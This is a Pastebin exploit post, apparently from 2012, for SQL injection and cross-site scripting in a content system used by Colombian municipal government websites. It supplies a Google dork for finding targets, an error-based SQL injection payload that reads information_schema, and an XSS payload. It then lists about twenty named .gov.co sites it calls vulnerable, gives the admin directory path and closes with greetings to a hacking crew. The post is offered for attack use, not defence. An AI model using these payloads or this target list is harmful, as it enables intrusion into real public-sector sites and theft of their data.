Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- +-------------------------------------------------+
- l # Author: Diego Asencio l
- l # Twitter: @Diego_Asencio l
- l # E-mail: diego.asencio@unillanos.edu.co l
- l # WorkGroup: [!]nside [0]utside - T34M l
- l # Twt_WG: @insid30utsid3 l
- +-------------------------------------------------+
- #################
- # INFORMACION #
- #################
- ###########################################################################################################
- # Exploit Title: IPRC - SQL InjecTion / Cross-Site Scripting
- # Vendor Name: Internet Para La Rendicion de Cuentas
- # Url Vendor: http://www.iprc.org.co
- # Category: WebApps
- # Risk: Critical
- # GoogleDork: "index.shtml?apc=I-xx-1-&x=" [or] "sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D= "
- # 0day exploits : 1337day.com Inj3ct0r Exploit DataBase
- ###########################################################################################################
- #################
- # 3XPL0IT #
- #################
- ###########################################################################################################
- # - [SQL] -
- # http://www.[M/pio]-[Dep/to].gov.co/index.shtml?apc=I-xx-1-&x=[SQL]
- #
- # - [XSS] -
- # http://www.[M/pio]-[Dep/to].gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS]
- #
- # ( XpL SQL )
- #
- # 2192436 and(select 1 from(select count(*),concat((select (select %String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
- Count(table_name) of information_schema.tables where table_schema=0x64625F3835303130
- #
- # (XpL XSS )
- #
- # "><img src=http://1337day.org/img/logo_green.jpg onerror=alert("1337");>
- #
- # -----------------------------------------------------------------------------------------------------
- # [ SAMPLE'S WEBSITES AFFECTED (SQL && XSS) INJ3CTI0N ]
- # ______________________________________________________________________________________________________
- #
- # # - SQL - #
- # http://www.puertolopez-meta.gov.co/index.shtml?apc=I-xx-1-&x=[SQL]
- # http://www.aguazul-casanare.gov.co/index.shtml?apc=I-xx-1-&x=[SQL]
- # http://www.abejorral-antioquia.gov.co/index.shtml?apc=I-xx-1-&x=[SQL]
- # http://www.cantagallo-bolivar.gov.co/index.shtml?apc=I-xx-1-&x=[SQL]
- # http://www.caldono-cauca.gov.co/index.shtml?apc=I-xx-1-&x=[SQL]
- # http://www.belen-boyaca.gov.co/index.shtml?apc=I-xx-1-&x=[SQL]
- # http://www.istmina-choco.gov.co/index.shtml?apc=I-xx-1-&x=[SQL]
- # http://www.riodeoro-cesar.gov.co/index.shtml?apc=I-xx-1-&x=[SQL]
- # http://www.yopal-casanare.gov.co/index.shtml?apc=I-xx-1-&x=[SQL]
- # http://www.sucre-cauca.gov.co /index.shtml?apc=I-xx-1-&x=[SQL]
- # _______________________________________________________________________________________________________
- #
- # # - XSS - #
- # http://www.caqueza-cundinamarca.gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS]
- # http://www.caracoli-antioquia.gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS]
- # http://www.caramanta-antioquia.gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS]
- # http://www.carepa-antioquia.gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS]
- # http://www.www.carmendecarupa-cundinamarca.gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS]
- # http://www.carolinadelprincipe-antioquia.gov.co /sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS]
- # http://www.cartagenadelchaira-caqueta.gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS]
- # http://www.castillalanueva-meta.gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS]
- #
- ########################################################################################################
- :::::::::::::::::::::::::::::::::::::::::::::::::::::::::
- :: Directory Admin : /apc-aa/admin/ ::
- :::::::::::::::::::::::::::::::::::::::::::::::::::::::::
- #############
- # Greet's #
- #################################################################################
- # @Sr_Xaoc - @ZiriusOpCol - @n4p573r - @Nick_Nitrous - @Ur0b0r0x #
- # @inj3ct0r - @Insid30utsid3 - @Anonymous_Co - @The_RevolutionH #
- # @unillanos_ # # 2012 #
- #################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement